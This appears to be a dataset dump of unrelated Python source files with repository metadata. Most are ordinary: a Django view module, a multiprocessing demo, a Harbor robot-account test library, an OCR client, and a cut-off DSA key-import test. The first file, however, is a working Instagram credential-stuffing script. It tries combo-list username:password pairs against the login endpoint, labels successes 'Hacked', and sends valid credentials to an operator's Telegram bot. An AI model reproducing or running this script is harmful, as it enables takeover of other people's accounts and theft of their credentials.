'''
print(logo1)
agar=input(" send good tlegram Y/N ")
if agar=='y' or agar=='' or agar=='Y' or agar=='' or agar=='':
ID=input(" ID Telegram :")
token=input(" Token(bot) : ")
else:
pass
print(W+' ---------------------------------------------------')
time.sleep(1)
import json, requests, user_agent,os ,sys, time, datetime
import requests
from user_agent import generate_user_agent
from datetime import datetime
os.system("rm -rf .daxl1.py")
try:
os.remove(".daxl1.py")
except:
pass
os.system("clear")
bad=0
timeout=0
hits=0
checkpoint=0
error=0
def instagram1():
import json, requests, user_agent,os ,sys, time, datetime
import requests
from user_agent import generate_user_agent
from datetime import datetime
r = requests.session()
import os, sys
def loopPp():
try:
combo=input(" Name Combo:")
file = open(combo,'r').read().splitlines()
global bad, timeout, checkpoint, error, hits, ID, token
for line in file:
user = line.split(':')[0]
pasw = line.split(':')[1]
url = 'https://www.instagram.com/accounts/login/ajax/'
head = {
'accept':'*/*',
'accept-encoding':'gzip,deflate,br',
'accept-language':'en-US,en;q=0.9,ar;q=0.8',
'content-length':'269',
'content-type':'application/x-www-form-urlencoded',
'cookie':'ig_did=77A45489-9A4C-43AD-9CA7-FA3FAB22FE24;ig_nrcb=1;csrftoken=VOPH7fUUOP85ChEViZkd2PhLkUQoP8P8;mid=YGwlfgALAAEryeSgDseYghX2LAC-',
'origin':'https://www.instagram.com',
'referer':'https://www.instagram.com/',
'sec-fetch-dest':'empty',
'sec-fetch-mode':'cors',
'sec-fetch-site':'same-origin',
'user-agent': generate_user_agent() ,
'x-csrftoken':'VOPH7fUUOP85ChEViZkd2PhLkUQoP8P8',
'x-ig-app-id':'936619743392459',
'x-ig-www-claim':'0',
'x-instagram-ajax':'8a8118fa7d40',
'x-requested-with':'XMLHttpRequest'}
time_now = int(datetime.now().timestamp())
data = {
'username': user,
'enc_password': "#PWD_INSTAGRAM_BROWSER:0:"+str(time_now)+":"+str(pasw),
'queryParams': {},
'optIntoOneTap': 'false',}
login = requests.post(url,headers=head,data=data,allow_redirects=True,verify=True).text
try:
if '"authenticated":false' in login:
os.system("clear")
print(logo2)
bad+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+' Eror'+W+' :'+B+' '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
elif '"message":"Please wait a few minutes before you try again."' in login:
os.system("clear")
print(logo2)
timeout+=1
import time
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
elif 'userId' in login:
os.system("clear")
print(logo2)
hits+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
boooom=f"GOOD: "+user+":"+pasw
r.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={boooom}\n')
with open('/sdcard/Good(instgram).txt', 'a') as ff:
ff.write(f"\nuser&num&emil: "+user+":"+pasw)
elif ('"message":"checkpoint_required"') in login:
os.system("clear")
print(logo2)
checkpoint+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
else:
os.system("clear")
print(logo2)
error+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
except:
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+'Time'+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
except FileNotFoundError:
print(" [ ! comboka la mobilet a nia ean Path halaya ! ]")
loopPp()
print("\n\n It's Over !\n File saved : /sdcard/[hits or checkpoint].txt")
instagram1()
|
[
"noreply@github.com"
] |
j2s20202929292j22n.noreply@github.com
|
baa48a422d44d84d04017a4899e5d56c666116e8
|
c591f5676468a7447f0e4f104c4889debb35c051
|
/resources/product.py
|
2fafbec78b86e12bf3dca5860bebd79c8efc4620
|
[] |
no_license
|
zhagyilig/Adahome
|
3f3bc1b664bd65964b8befa78405c07da3c8a228
|
76f08be7c21e90bb58803aa1c11be59f66332f42
|
refs/heads/dev
| 2022-12-12T11:51:30.341859
| 2019-07-10T04:22:12
| 2019-07-10T04:22:12
| 149,948,322
| 2
| 4
| null | 2022-12-08T01:01:36
| 2018-09-23T04:39:23
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,566
|
py
|
# coding=utf-8
# auth: zhangyiling
from django.views.generic import ListView, View, TemplateView # 需要返回json数据就用View
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect
from django.contrib.auth.models import User
from django.http import JsonResponse
from .forms import ProductForm # 表单验证
from resources.models import Product, Idc
import json
'''
1. 业务线
'''
class AddProductTemView(LoginRequiredMixin, TemplateView):
    """Render and process the "add product (business line)" form."""
    template_name = 'resources/server/add_product.html'
    def get_context_data(self, **kwargs):
        """Supply the non-admin user list and top-level lines to the template."""
        context = super(AddProductTemView, self).get_context_data(**kwargs)
        context['userlist'] = User.objects.filter(is_superuser=False)  # filter out superusers
        context['products'] = Product.objects.filter(pid__exact=0)  # exact match: top-level lines only
        return context
    def post(self, request):
        '''
        Read and validate the submitted "add business line" form data,
        persist a new Product, then redirect to success or error.
        :param request:
        :return:
        '''
        print(request.POST)
        product_form = ProductForm(request.POST)  # validate the submitted data
        # Testing leftovers:
        # product_form.is_valid()
        # return JsonResponse({'status': 'success'})
        if product_form.is_valid():  # validate the data
            pro = Product(**product_form.cleaned_data)  # cleaned_data holds the validated fields
            try:
                pro.save()
                return redirect('success', next='product_manage')
            except Exception as e:
                return redirect('error', next='product_manage', msg=e.args)
        else:
            error_msg = json.dumps(json.loads(product_form.errors.as_json()), ensure_ascii=False)
            return redirect('error', next='product_manage', msg=error_msg)
'''
2. 业务线管理
'''
class ProductManageTemView(LoginRequiredMixin, TemplateView):
    """Business-line management page, rendered with the ztree data inlined."""
    template_name = 'resources/server/product_manage.html'
    def get_context_data(self, **kwargs):
        context = super(ProductManageTemView, self).get_context_data(**kwargs)
        context['ztree'] = Ztree().get()  # template side: var zNodes = {{ ztree|safe }};
        return context
'''
3. ztree显示业务线树状
'''
class ZnodeView(LoginRequiredMixin, View):
    """JSON endpoint returning the business-line tree for the ztree widget."""
    def get(self, request):
        ztree = Ztree()
        znode = ztree.get()
        print('zonde: ', znode)  # NOTE(review): debug print (typo for 'znode'); consider removing
        return JsonResponse(znode, safe=False)  # safe=False: top-level value is a list, not a dict
class Ztree(object):
    """Builds the nested node structure consumed by the front-end ztree widget."""
    def __init__(self):
        # Snapshot of all Product rows, filtered in memory-independent queries below.
        self.data = self.get_product()
    def get_product(self):
        # Fetch all rows of the Product table.
        return Product.objects.all()
    def get(self, idc=False):
        '''
        Build the first-level business lines (pid == 0); when *idc* is True,
        wrap them under the IDC nodes as the tree roots.
        :return:
        '''
        ret = []
        for p in self.data.filter(pid=0):
            print('p :', p)
            node = {
                'name': p.service_name,
                'id': p.id,
                'pid': p.pid,
                'children': self.get_children(p.id),  # a second-level line's pid is the first-level line's id
                'isParent': 'true',  # the JS-side string 'true'
            }
            ret.append(node)
        if idc:
            return self.get_idc(ret)
        else:
            return ret
    def get_children(self, id):
        '''
        Build the second-level business lines.
        :param id: id of the first-level line, which is the pid of its children
        :return:
        '''
        ret = []
        for p in self.data.filter(pid=id):  # a second-level line's pid is the first-level line's id
            print('get_children: ', p)
            node = {
                'name': p.service_name,
                'id': p.id,
                'pid': p.pid,
            }
            ret.append(node)
        return ret
    def get_idc(self, nodes):
        '''
        Fetch the IDCs and use them as the top level of the ztree.
        :param nodes:
        :return:
        '''
        ret = []
        for i in Idc.objects.all():
            node = {
                'name': i.idc_name,
                'children': nodes,  # nodes are the first-level business lines built above
                'isParent': 'true',  # the JSON-side string 'true'
            }
            ret.append(node)
        return ret
'''
4. 业务线详情
'''
class ProductGetView(LoginRequiredMixin, View):
    """Business-line detail endpoint: one record by id, or children by pid."""
    def get(self, request):
        ret = {"status": 0}
        # 1. Given a product id, return that single record.
        p_id = self.request.GET.get("id", None)
        p_pid = self.request.GET.get("pid", None)
        if p_id:
            ret["data"] = self.get_obj_dict(p_id)
        # 2. Given a product pid, return all matching records.
        if p_pid:
            ret["data"] = self.get_products(p_pid)
        # 3. Neither parameter given: the original note said "return all
        #    records", but only {"status": 0} is actually returned here.
        return JsonResponse(ret)
    def get_obj_dict(self, p_id):
        try:
            obj = Product.objects.get(pk=p_id)
            ret = obj.__dict__  # we need a plain dict data structure
            ret.pop("_state")  # __dict__ carries Django's internal _state field; drop it (see the transcript below)
            return ret
        except Product.DoesNotExist:
            return {}
    def get_products(self, pid):
        return list(Product.objects.filter(pid=pid).values())
'''
测试:
In [8]: p = Product.objects.get(pk=1)
In [9]: p
Out[9]: <Product: 物流系统>
In [10]: p.__dict__
Out[10]:
{'_state': <django.db.models.base.ModelState at 0x7f15855d17f0>,
'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
In [11]: d = p.__dict__
In [12]: d
Out[12]:
{'_state': <django.db.models.base.ModelState at 0x7f15855d17f0>,
'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
In [13]: d.pop('_state')
Out[13]: <django.db.models.base.ModelState at 0x7f15855d17f0>
In [14]: d
Out[14]:
{'id': 1,
'service_name': '物流系统',
'module_letter': 'ALS',
'op_interface': 'zhang-1@ezbuy.com,zhang-3@ezbuy.com',
'dev_interface': 'zyl@qq.com,zhang-8@ezbuy.com',
'pid': 0}
'''
|
[
"YilingZhang@YilingZhang.local"
] |
YilingZhang@YilingZhang.local
|
1bb1e3a577fac699b94553a18c892fb9eb2daf03
|
0f994ce5f6ac5afe2d574ee0bd763bafcbe4af0e
|
/demo/multiprocessing01.py
|
4138736af4ff2265d70ca2229b0c80750c332e35
|
[] |
no_license
|
jingjianqian/python
|
c0310f29219db47b014bf3c83bb6fb681fbc1f25
|
14ba40ebed57866ebd78875e782a295371cbf7fe
|
refs/heads/master
| 2023-03-16T06:57:12.343473
| 2023-03-13T13:48:07
| 2023-03-13T13:48:07
| 81,185,145
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
import multiprocessing
import os
import time
def sing(name, lyric, times):
    """Print the singer's process id and the lyric, *times* times over."""
    for _round in range(times):
        # os.getpid() makes it visible that this runs in the child process
        # when spawned via multiprocessing.
        print("老王唱歌ID:", os.getpid())
        print("{}: {}".format(name, lyric))
def dance(name, danceStep, times):
    """Print the dancer's process id and dance step, *times* times over."""
    count = 0
    while count < times:
        # os.getpid() makes it visible that this runs in the child process
        # when spawned via multiprocessing.
        print("老王跳舞ID:", os.getpid())
        print("{}:{}".format(name, danceStep))
        count += 1
if __name__ == '__main__':
    # Two child processes: one passes positional args, one keyword args.
    sing_process = multiprocessing.Process(target=sing, args=("隔壁老王", "我爱你老婆", 10))
    dance_process = multiprocessing.Process(target=dance,kwargs={"times": 10, "name": "老王", "danceStep": "I will will,fuck you!"})
    print("爸爸进程编号:", os.getpid())
    print("爷爷进程编号:", os.getppid())
    sing_process.daemon = True  # daemon children are killed when the main process exits
    dance_process.daemon = True  # daemon children are killed when the main process exits
    sing_process.start()
    dance_process.start()
    # Give the daemon children ~0.1 s to run before the main process exits.
    time.sleep(0.1)
    # dance_process.daemon = True
    print("主进程结束。。。。")
|
[
"18697998680@163.com"
] |
18697998680@163.com
|
6ef16ead219a63a61ae7974a59ef9b7476ded432
|
29c3cc5c19c54869e7f565c036a628fe6b598b35
|
/tests/apitests/python/library/robot.py
|
5a5fc280aaa3fa5359bd2d5795d6e3d1f9e05cca
|
[
"Apache-2.0"
] |
permissive
|
tmax-cloud/hyperregistry_no_support
|
ab1da648ba3458935c5b3bf0151341853f760219
|
058fe24f9efb9f0d51f27659b0959a8af735d0a0
|
refs/heads/main
| 2023-04-06T03:02:04.476266
| 2021-04-19T02:38:58
| 2021-04-19T02:38:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,649
|
py
|
# -*- coding: utf-8 -*-
import time
import base
import v2_swagger_client
from v2_swagger_client.rest import ApiException
from base import _assert_status_code
class Robot(base.Base, object):
    """Test-library client wrapping Harbor's robot-account REST endpoints.

    Each method asserts the HTTP status returned by the generated
    v2_swagger_client and returns the response payload.
    """
    def __init__(self):
        super(Robot,self).__init__(api_type = "robot")
    def list_robot(self, expect_status_code = 200, **kwargs):
        """List robot accounts; on ApiException assert the status and return []."""
        client = self._get_client(**kwargs)
        try:
            body, status_code, _ = client.list_robot_with_http_info()
        except ApiException as e:
            base._assert_status_code(expect_status_code, e.status)
            return []
        else:
            base._assert_status_code(expect_status_code, status_code)
            base._assert_status_code(200, status_code)
            return body
    def create_access_list(self, right_map = [True] * 10):
        """Map a 10-entry boolean list onto the fixed resource/action pairs below.

        NOTE(review): mutable default argument; it is only read here, but a
        fresh list per call would be safer.
        """
        _assert_status_code(10, len(right_map), r"Please input full access list for system robot account. Expected {}, while actual input count is {}.")
        action_pull = "pull"
        action_push = "push"
        action_read = "read"
        action_create = "create"
        action_del = "delete"
        # Index i of right_map enables/disables access_def_list[i].
        access_def_list = [
            ("repository", action_pull),
            ("repository", action_push),
            ("artifact", action_del),
            ("helm-chart", action_read),
            ("helm-chart-version", action_create),
            ("helm-chart-version", action_del),
            ("tag", action_create),
            ("tag", action_del),
            ("artifact-label", action_create),
            ("scan", action_create)
        ]
        access_list = []
        for i in range(len(access_def_list)):
            if right_map[i] is True:
                robotAccountAccess = v2_swagger_client.Access(resource = access_def_list[i][0], action = access_def_list[i][1])
                access_list.append(robotAccountAccess)
        return access_list
    def create_project_robot(self, project_name, duration, robot_name = None, robot_desc = None,
                                  has_pull_right = True, has_push_right = True, has_chart_read_right = True,
                                  has_chart_create_right = True, expect_status_code = 201, expect_response_body = None,
                                  **kwargs):
        """Create a project-level robot; return (robot_id, response_body)."""
        if robot_name is None:
            robot_name = base._random_name("robot")
        if robot_desc is None:
            robot_desc = base._random_name("robot_desc")
        # A robot must hold at least the pull right.
        if has_pull_right is False and has_push_right is False:
            has_pull_right = True
        access_list = []
        action_pull = "pull"
        action_push = "push"
        action_read = "read"
        action_create = "create"
        if has_pull_right is True:
            robotAccountAccess = v2_swagger_client.Access(resource = "repository", action = action_pull)
            access_list.append(robotAccountAccess)
        if has_push_right is True:
            robotAccountAccess = v2_swagger_client.Access(resource = "repository", action = action_push)
            access_list.append(robotAccountAccess)
        if has_chart_read_right is True:
            robotAccountAccess = v2_swagger_client.Access(resource = "helm-chart", action = action_read)
            access_list.append(robotAccountAccess)
        if has_chart_create_right is True:
            robotAccountAccess = v2_swagger_client.Access(resource = "helm-chart-version", action = action_create)
            access_list.append(robotAccountAccess)
        robotaccountPermissions = v2_swagger_client.RobotPermission(kind = "project", namespace = project_name, access = access_list)
        permission_list = []
        permission_list.append(robotaccountPermissions)
        robotAccountCreate = v2_swagger_client.RobotCreate(name=robot_name, description=robot_desc, duration=duration, level="project", permissions = permission_list)
        client = self._get_client(**kwargs)
        data = []
        try:
            data, status_code, header = client.create_robot_with_http_info(robotAccountCreate)
        except ApiException as e:
            base._assert_status_code(expect_status_code, e.status)
            if expect_response_body is not None:
                base._assert_status_body(expect_response_body, e.body)
        else:
            base._assert_status_code(expect_status_code, status_code)
            base._assert_status_code(201, status_code)
            # The new robot's id is carried in the Location header.
            return base._get_id_from_header(header), data
    def get_robot_account_by_id(self, robot_id, **kwargs):
        """Fetch a single robot account by id."""
        client = self._get_client(**kwargs)
        data, status_code, _ = client.get_robot_by_id_with_http_info(robot_id)
        return data
    def disable_robot_account(self, robot_id, disable, expect_status_code = 200, **kwargs):
        """Set the robot's disable flag, re-sending its current fields unchanged."""
        client = self._get_client(**kwargs)
        data = self.get_robot_account_by_id(robot_id, **kwargs)
        robotAccountUpdate = v2_swagger_client.RobotCreate(name=data.name, description=data.description, duration=data.duration, level=data.level, permissions = data.permissions, disable = disable)
        _, status_code, _ = client.update_robot_with_http_info(robot_id, robotAccountUpdate)
        base._assert_status_code(expect_status_code, status_code)
        base._assert_status_code(200, status_code)
    def delete_robot_account(self, robot_id, expect_status_code = 200, **kwargs):
        """Delete a robot account and assert the returned status."""
        client = self._get_client(**kwargs)
        _, status_code, _ = client.delete_robot_with_http_info(robot_id)
        base._assert_status_code(expect_status_code, status_code)
        base._assert_status_code(200, status_code)
    def create_system_robot(self, permission_list, duration, robot_name = None, robot_desc = None, expect_status_code = 201, **kwargs):
        """Create a system-level robot; return (robot_id, response_body)."""
        if robot_name is None:
            robot_name = base._random_name("robot")
        if robot_desc is None:
            robot_desc = base._random_name("robot_desc")
        robotAccountCreate = v2_swagger_client.RobotCreate(name=robot_name, description=robot_desc, duration=duration, level="system", disable = False, permissions = permission_list)
        print("robotAccountCreate:", robotAccountCreate)
        client = self._get_client(**kwargs)
        data = []
        data, status_code, header = client.create_robot_with_http_info(robotAccountCreate)
        base._assert_status_code(expect_status_code, status_code)
        base._assert_status_code(201, status_code)
        return base._get_id_from_header(header), data
    def update_robot_account(self, robot_id, robot, expect_status_code = 200, **kwargs):
        """PUT the given Robot model and assert the returned status."""
        client = self._get_client(**kwargs)
        _, status_code, _ = client.update_robot_with_http_info(robot_id, robot)
        base._assert_status_code(expect_status_code, status_code)
        base._assert_status_code(200, status_code)
    def update_system_robot_account(self, robot_id, robot_name, robot_account_Permissions_list, disable = None, expect_status_code = 200, **kwargs):
        """Update a system robot's permissions and, optionally, its disable flag."""
        robot = v2_swagger_client.Robot(id = robot_id, name = robot_name, level = "system", permissions = robot_account_Permissions_list)
        if disable in (True, False):
            robot.disable = disable
        self.update_robot_account(robot_id, robot, expect_status_code = expect_status_code, **kwargs)
    def refresh_robot_account_secret(self, robot_id, robot_new_sec, expect_status_code = 200, **kwargs):
        """Replace the robot's secret and return the refreshed secret payload."""
        robot_sec = v2_swagger_client.RobotSec(secret = robot_new_sec)
        client = self._get_client(**kwargs)
        data, status_code, _ = client.refresh_sec_with_http_info(robot_id, robot_sec)
        base._assert_status_code(expect_status_code, status_code)
        base._assert_status_code(200, status_code)
        print("Refresh new secret:", data)
        return data
|
[
"kyunghoon451@gmail.com"
] |
kyunghoon451@gmail.com
|
51973d58aa65467822f1a79425b654ce1519849c
|
28bdfca0131db38323fc28f6178425dc2c86e6ca
|
/test/ocr_detect_demo.py
|
593bfa686fa9e9d6660d2515225231592ddaeaf3
|
[] |
no_license
|
my-xh/hengDaProject
|
d8879d6755b24f230361b25d0e88d205fec98a1d
|
45aa43aabc798652a0f05d4e93d1c2c7ae819e4c
|
refs/heads/master
| 2023-04-20T07:04:57.424269
| 2021-05-13T11:46:48
| 2021-05-13T11:46:48
| 345,997,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
# -*- coding: utf-8 -*-
"""
@File : ocr_detect_demo.py
@Time : 2021/5/5 13:38
@Author : my-xh
@Version : 1.0
@Software: PyCharm
@Desc :
"""
import requests
url = 'http://192.168.1.101:8000/service/api/ocrdetect/'
# 上传图像并检测
tracker = None
img_path = 'ocrtest.png'
files = {
'image': ('filename2', open(img_path, 'rb'), 'image/jpeg')
}
res = requests.post(url, data=tracker, files=files).json().get('code')
# 显示识别内容
if res:
print(f'识别结果:\n{res.strip()}')
else:
print('识别失败!')
|
[
"2435128850@qq.com"
] |
2435128850@qq.com
|
8094c33ac4334a040146a3872ef016d04da6ad68
|
2205363ea412aae36aa2c5f8b7d608cd8a158a03
|
/Personal_Blog/venv/Lib/site-packages/Crypto/SelfTest/PublicKey/test_import_DSA.py
|
c2b5e16b633636f7656c384a0ea51e678be449a3
|
[] |
no_license
|
Akanksha2403/HacktoberFest2020
|
986ef7ba5595679085e5159d35c5a30d9e91ebc5
|
789762e3a4a3ad23fd2c1ca3b6cc3bc8f39eed82
|
refs/heads/master
| 2023-08-28T04:25:07.466359
| 2021-10-20T10:16:46
| 2021-10-20T10:16:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,034
|
py
|
# -*- coding: utf-8 -*-
#
# SelfTest/PublicKey/test_import_DSA.py: Self-test for importing DSA keys
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
import re
from Crypto.PublicKey import DSA
from Crypto.SelfTest.st_common import *
from Crypto.Util.py3compat import *
from binascii import unhexlify
class ImportKeyTests(unittest.TestCase):
y = 92137165128186062214622779787483327510946462589285775188003362705875131352591574106484271700740858696583623951844732128165434284507709057439633739849986759064015013893156866539696757799934634945787496920169462601722830899660681779448742875054459716726855443681559131362852474817534616736104831095601710736729
p = 162452170958135306109773853318304545923250830605675936228618290525164105310663722368377131295055868997377338797580997938253236213714988311430600065853662861806894003694743806769284131194035848116051021923956699231855223389086646903420682639786976554552864568460372266462812137447840653688476258666833303658691
q = 988791743931120302950649732173330531512663554851
g = 85583152299197514738065570254868711517748965097380456700369348466136657764813442044039878840094809620913085570225318356734366886985903212775602770761953571967834823306046501307810937486758039063386311593890777319935391363872375452381836756832784184928202587843258855704771836753434368484556809100537243908232
x = 540873410045082450874416847965843801027716145253
def setUp(self):
# It is easier to write test vectors in text form,
# and convert them to byte strigs dynamically here
for mname, mvalue in ImportKeyTests.__dict__.items():
if mname[:4] in ('der_', 'pem_', 'ssh_'):
if mname[:4] == 'der_':
mvalue = unhexlify(tobytes(mvalue))
mvalue = tobytes(mvalue)
setattr(self, mname, mvalue)
# 1. SubjectPublicKeyInfo
der_public=\
'308201b73082012b06072a8648ce3804013082011e02818100e756ee1717f4b6'+\
'794c7c214724a19763742c45572b4b3f8ff3b44f3be9f44ce039a2757695ec91'+\
'5697da74ef914fcd1b05660e2419c761d639f45d2d79b802dbd23e7ab8b81b47'+\
'9a380e1f30932584ba2a0b955032342ebc83cb5ca906e7b0d7cd6fe656cecb4c'+\
'8b5a77123a8c6750a481e3b06057aff6aa6eba620b832d60c3021500ad32f48c'+\
'd3ae0c45a198a61fa4b5e20320763b2302818079dfdc3d614fe635fceb7eaeae'+\
'3718dc2efefb45282993ac6749dc83c223d8c1887296316b3b0b54466cf444f3'+\
'4b82e3554d0b90a778faaf1306f025dae6a3e36c7f93dd5bac4052b92370040a'+\
'ca70b8d5820599711900efbc961812c355dd9beffe0981da85c5548074b41c56'+\
'ae43fd300d89262e4efd89943f99a651b03888038185000281810083352a69a1'+\
'32f34843d2a0eb995bff4e2f083a73f0049d2c91ea2f0ce43d144abda48199e4'+\
'b003c570a8af83303d45105f606c5c48d925a40ed9c2630c2fa4cdbf838539de'+\
'b9a29f919085f2046369f627ca84b2cb1e2c7940564b670f963ab1164d4e2ca2'+\
'bf6ffd39f12f548928bf4d2d1b5e6980b4f1be4c92a91986fba559'
def testImportKey1(self):
key_obj = DSA.importKey(self.der_public)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey1(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('DER')
self.assertEqual(self.der_public, encoded)
# 2.
pem_public="""\
-----BEGIN PUBLIC KEY-----
MIIBtzCCASsGByqGSM44BAEwggEeAoGBAOdW7hcX9LZ5THwhRyShl2N0LEVXK0s/
j/O0Tzvp9EzgOaJ1dpXskVaX2nTvkU/NGwVmDiQZx2HWOfRdLXm4AtvSPnq4uBtH
mjgOHzCTJYS6KguVUDI0LryDy1ypBuew181v5lbOy0yLWncSOoxnUKSB47BgV6/2
qm66YguDLWDDAhUArTL0jNOuDEWhmKYfpLXiAyB2OyMCgYB539w9YU/mNfzrfq6u
NxjcLv77RSgpk6xnSdyDwiPYwYhyljFrOwtURmz0RPNLguNVTQuQp3j6rxMG8CXa
5qPjbH+T3VusQFK5I3AECspwuNWCBZlxGQDvvJYYEsNV3Zvv/gmB2oXFVIB0tBxW
rkP9MA2JJi5O/YmUP5mmUbA4iAOBhQACgYEAgzUqaaEy80hD0qDrmVv/Ti8IOnPw
BJ0skeovDOQ9FEq9pIGZ5LADxXCor4MwPUUQX2BsXEjZJaQO2cJjDC+kzb+DhTne
uaKfkZCF8gRjafYnyoSyyx4seUBWS2cPljqxFk1OLKK/b/058S9UiSi/TS0bXmmA
tPG+TJKpGYb7pVk=
-----END PUBLIC KEY-----"""
def testImportKey2(self):
for pem in (self.pem_public, tostr(self.pem_public)):
key_obj = DSA.importKey(pem)
self.failIf(key_obj.has_private())
self.assertEqual(self.y, key_obj.y)
self.assertEqual(self.p, key_obj.p)
self.assertEqual(self.q, key_obj.q)
self.assertEqual(self.g, key_obj.g)
def testExportKey2(self):
tup = (self.y, self.g, self.p, self.q)
key = DSA.construct(tup)
encoded = key.export_key('PEM')
self.assertEqual(self.pem_public, encoded)
# 3. OpenSSL/OpenSSH format
der_private=\
'308201bb02010002818100e756ee1717f4b6794c7c214724a19763742c45572b'+\
'4b3f8ff3b44f3be9f44ce039a2757695ec915697da74ef914fcd1b05660e2419'+\
'c761d639f45d2d79b802dbd23e7ab8b81b479a380e1f30932584ba2a0b955032'+\
'342ebc83cb5ca906e7b0d7cd6fe656cecb4c8b5a77123a8c6750a481e3b06057'+\
'aff6aa6eba620b832d60c3021500ad32f48cd3ae0c45a198a61fa4b5e2032076'+\
'3b2302818079dfdc3d614fe635fceb7eaeae3718dc2efefb45282993ac6749dc'+\
'83c223d8c1887296316b3b0b54466cf444f34b82e3554d0b90a778faaf1306f0'+\
'25dae6a3e36c7f93dd5bac4052b92370040aca70b8d5820599711900efbc9618'+\
'12c355dd9beffe0981da85c5548074b41c56ae43fd300d89262e4efd89943f99'+\
'a651b038880281810083352a69a132f34843d2a0eb995bff4e2f083a73f0049d'+\
'2c91ea2f0ce43d144abda48199e4b003c570a8af83303d45105f606c5c48d925'+\
'a40ed9c2630c2fa4cdbf838539deb9a29f919085f2046369f627ca84b2cb1e2c'+\
